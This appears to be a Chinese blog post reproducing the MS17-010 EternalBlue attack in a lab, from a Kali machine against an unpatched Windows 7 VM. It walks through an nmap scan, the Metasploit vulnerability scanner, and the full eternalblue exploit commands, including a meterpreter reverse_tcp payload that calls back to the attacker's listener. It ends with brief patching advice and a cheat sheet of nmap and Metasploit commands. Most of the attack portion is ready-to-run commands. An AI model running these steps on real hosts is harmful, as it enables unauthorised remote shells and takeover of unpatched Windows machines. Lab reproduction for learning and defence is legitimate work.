MS17_010复现

MS17_010复现

说明:

攻击机:Kali ip地址 172.21.101.110 安装msfconsole

靶 机:win7 ip地址 192.168.160.130 默认开启445端口,未打补丁

 

  1. 信息收集

    • 查看端口开放情况、系统版本。

      nmap -Pn -sS -O 192.168.160.130
      #-sS:TCP 同步扫描
      #-Pn:不对目标进行ping探测(不判断主机是否在线)(直接扫描端口)
      #-O:获取主机标志判断系统型号

      扫描结果:stX72d.png

  2. 漏洞探测

    • 启动MSF sthM7R.png

    • 查找Metasploit框架中MSF17_010模块sthy38.png

    • 检测靶机是否存在MSF17_010漏洞

      输入代码验证是否存在漏洞

      msfconsole                                              #启动MSF
      use auxiliary/scanner/smb/smb_ms17_010 #装载扫描模块
      set RHOSTS 192.168.160.130 #设置靶机IP地址
      run #运行

      stOkSs.png

    • 返回下面数据证明存在MS17_010漏洞

       Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64
  3. 实施攻击

    • 输入代码进行攻击

      use exploit/windows/smb/ms17_010_eternalblue    #装载ms17_010_EternalBlue攻击模块
      #截图里面是use 2是为了方便
      set lhost 172.21.101.110 #设置接收shell的IP
      set lport 9999 #设置监听shell返回的端口
      set payload windows/x64/meterpreter/reverse_tcp #设置shell的通讯类型
      set rhosts 192.168.160.130 #设置攻击目标
      run #运行

      stOMY4.png

      如下图说明攻击成功拿到shell

      stOsXt.png

  4. 漏洞利用

    • 进入cmd shell在命令行输入shell

      shell                                       #不知道为啥软码

      stvnTf.png

  5. 漏洞修复

    • 及时更新补丁

    • 关闭多余端口

    • 开启防火墙

       

  6. 相关命令

    • NMAP

      -O          #这个选项激活对 TCP/IP 指纹特征的扫描,获得远程主机的标志,也就是操作系统类型
      -Pn #不对目标进行ping探测(不判断主机是否在线)(直接扫描端口)
      -sP   #ping 扫描,用 ping 方式检查网络上哪些主机正在运行
      -sS #TCP 同步扫描,因为不必全部打开一个 TCP 连接,所以这项技术通常称为半开扫描
      -sT #TCP connect扫描,这是最基本的 TCP 扫描方式。这种扫描很容易被检测到
      -sU #表示udp scan,udp端口扫描
      -sV #用于扫描目标主机服务版本号.
      -v   #冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息
    • MSF终端

      show exploits               #列出框架中的所有渗透攻击模块。
      show payloads #列出框架中所有的攻击载荷。
      show auxiliary #列出框架中的所有辅助攻击模块。
      use name #装载一个渗透攻击或者模块
      LHOST #反弹shell IP
      RPROT #反射shell监听端口
      RHOST #目标主机
    •  

     

posted @ 2021-01-13 14:44  beitso-admin  阅读(222)  评论(0编辑  收藏  举报